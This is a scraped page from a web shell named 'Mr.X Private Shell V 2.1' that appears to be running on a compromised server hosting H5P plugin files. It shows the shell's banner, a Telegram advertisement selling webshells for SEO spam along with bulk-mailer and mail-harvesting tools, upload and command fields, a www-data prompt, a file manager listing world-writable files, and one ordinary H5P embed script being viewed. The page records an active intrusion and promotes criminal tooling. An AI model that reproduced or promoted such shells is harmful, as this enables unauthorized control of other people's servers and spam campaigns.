__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
/*jshint multistr: true */

/**
 * Converts old script tag embed to iframe
 */
var H5POldEmbed = H5POldEmbed || (function () {
  var head = document.getElementsByTagName('head')[0];
  var resizer = false;

  /**
   * Loads the resizing script
   */
  var loadResizer = function (url) {
    var data, callback = 'H5POldEmbed';
    resizer = true;

    // Callback for when content data is loaded.
    window[callback] = function (content) {
      // Add resizing script to head
      var resizer = document.createElement('script');
      resizer.src = content;
      head.appendChild(resizer);

      // Clean up
      head.removeChild(data);
      delete window[callback];
    };

    // Create data script
    data = document.createElement('script');
    data.src = url + (url.indexOf('?') === -1 ? '?' : '&') + 'callback=' + callback;
    head.appendChild(data);
  };

  /**
   * Replaced script tag with iframe
   */
  var addIframe = function (script) {
    // Add iframe
    var iframe = document.createElement('iframe');
    iframe.src = script.getAttribute('data-h5p');
    iframe.frameBorder = false;
    iframe.allowFullscreen = true;
    var parent = script.parentNode;
    parent.insertBefore(iframe, script);
    parent.removeChild(script);
  };

  /**
   * Go throught all script tags with the data-h5p attribute and load content.
   */
  function H5POldEmbed() {
    var scripts = document.getElementsByTagName('script');
    var h5ps = []; // Use seperate array since scripts grow in size.
    for (var i = 0; i < scripts.length; i++) {
      var script = scripts[i];
      if (script.src.indexOf('/h5p-resizer.js') !== -1) {
        resizer = true;
      }
      else if (script.hasAttribute('data-h5p')) {
        h5ps.push(script);
      }
    }
    for (i = 0; i < h5ps.length; i++) {
      if (!resizer) {
        loadResizer(h5ps[i].getAttribute('data-h5p'));
      }
      addIframe(h5ps[i]);
    }
  }

  return H5POldEmbed;
})();

new H5POldEmbed();

Filemanager

Name Type Size Permission Actions
settings Folder 0777
h5p-action-bar.js File 2.87 KB 0777
h5p-confirmation-dialog.js File 12.21 KB 0777
h5p-content-type.js File 1.26 KB 0777
h5p-content-upgrade-process.js File 9.37 KB 0777
h5p-content-upgrade-worker.js File 1.47 KB 0777
h5p-content-upgrade.js File 11.29 KB 0777
h5p-data-view.js File 11.95 KB 0777
h5p-display-options.js File 1.28 KB 0777
h5p-embed.js File 1.93 KB 0777
h5p-event-dispatcher.js File 6.29 KB 0777
h5p-hub-registration.js File 161.72 KB 0777
h5p-hub-sharing.js File 235.33 KB 0777
h5p-library-details.js File 10.7 KB 0777
h5p-library-list.js File 4.22 KB 0777
h5p-resizer.js File 3.57 KB 0777
h5p-tooltip.js File 6.98 KB 0777
h5p-utils.js File 12.51 KB 0777
h5p-version.js File 926 B 0777
h5p-x-api-event.js File 8.55 KB 0777
h5p-x-api.js File 3.64 KB 0777
h5p.js File 87.13 KB 0777
jquery.js File 88.08 KB 0777
request-queue.js File 11.41 KB 0777
Filemanager